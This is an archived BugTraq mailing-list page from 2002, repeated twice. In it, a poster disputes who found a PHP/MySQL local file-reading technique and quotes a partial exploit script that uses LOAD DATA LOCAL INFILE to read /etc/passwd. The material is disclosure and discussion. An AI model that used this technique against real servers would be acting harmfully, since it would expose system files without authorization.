BugTraq
Back to list
|
Post reply
File reading vulnerable in PHP and MySQL (Local Exploit)
Nov 26 2002 10:57AM
Hai Nam Luke (hainamluke hotmail com)
(1 replies)
Re: File reading vulnerable in PHP and MySQL (Local Exploit)
Nov 27 2002 09:54AM
Dave Wilson (dw botanicus net)
Hi there,
Please see http://botanicus.net/dw/sec.html - I wrote about this in
February. Prior to that, other people have claimed to have come across
this too.
On Tue, Nov 26, 2002 at 10:57:52AM -0000, Hai Nam Luke wrote:
> Attacker can use PHP and mySQL to read some local file following this way:
>
> # Create a database (mySQL) and upload this file to your server
> PHP Code: viewfile.php (programmed by Luke)
>
> ======================================================
> <?
> // config this data
> $dbhost = "";
> $dbuser = "";
> $dbpasswd = "";
> $dbname = "";
> $file = "/etc/passwd"; // filename that you wanna view
>
> // shell code
> echo "<pre>";
>
> mysql_connect ($dbhost, $dbuser,
> $dbpasswd);
> $sql = array (
> "USE $dbname",
>
> 'CREATE TEMPORARY TABLE ' . ($tbl
> = 'A'.time
> ()) . ' (a LONGBLOB)',
>
> "LOAD DATA LOCAL INFILE '$file' INTO
> TABLE
> $tbl FIELDS "
> . "TERMINATED BY
> '__THIS_NEVER_HAPPENS__' "
> . "ESCAPED BY '' "
> . "LINES TERMINATED BY
> '__THIS_NEVER_HAPPENS__'",
>
> "SELECT a FROM $tbl LIMIT 1"
> );
Umm, this is my code. Please check any good Bugtraq archive for proof of
this fact. This is pretty much identical, except my English is better
:-).
> Luke (HVA)
> http://www.hackervn.net
Dave Wilson.
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Please see http://botanicus.net/dw/sec.html - I wrote about this in
February. Prior to that, other people have claimed to have come across
this too.
On Tue, Nov 26, 2002 at 10:57:52AM -0000, Hai Nam Luke wrote:
> Attacker can use PHP and mySQL to read some local file following this way:
>
> # Create a database (mySQL) and upload this file to your server
> PHP Code: viewfile.php (programmed by Luke)
>
> ======================================================
> <?
> // config this data
> $dbhost = "";
> $dbuser = "";
> $dbpasswd = "";
> $dbname = "";
> $file = "/etc/passwd"; // filename that you wanna view
>
> // shell code
> echo "<pre>";
>
> mysql_connect ($dbhost, $dbuser,
> $dbpasswd);
> $sql = array (
> "USE $dbname",
>
> 'CREATE TEMPORARY TABLE ' . ($tbl
> = 'A'.time
> ()) . ' (a LONGBLOB)',
>
> "LOAD DATA LOCAL INFILE '$file' INTO
> TABLE
> $tbl FIELDS "
> . "TERMINATED BY
> '__THIS_NEVER_HAPPENS__' "
> . "ESCAPED BY '' "
> . "LINES TERMINATED BY
> '__THIS_NEVER_HAPPENS__'",
>
> "SELECT a FROM $tbl LIMIT 1"
> );
Umm, this is my code. Please check any good Bugtraq archive for proof of
this fact. This is pretty much identical, except my English is better
:-).
> Luke (HVA)
> http://www.hackervn.net
Dave Wilson.
[ reply ]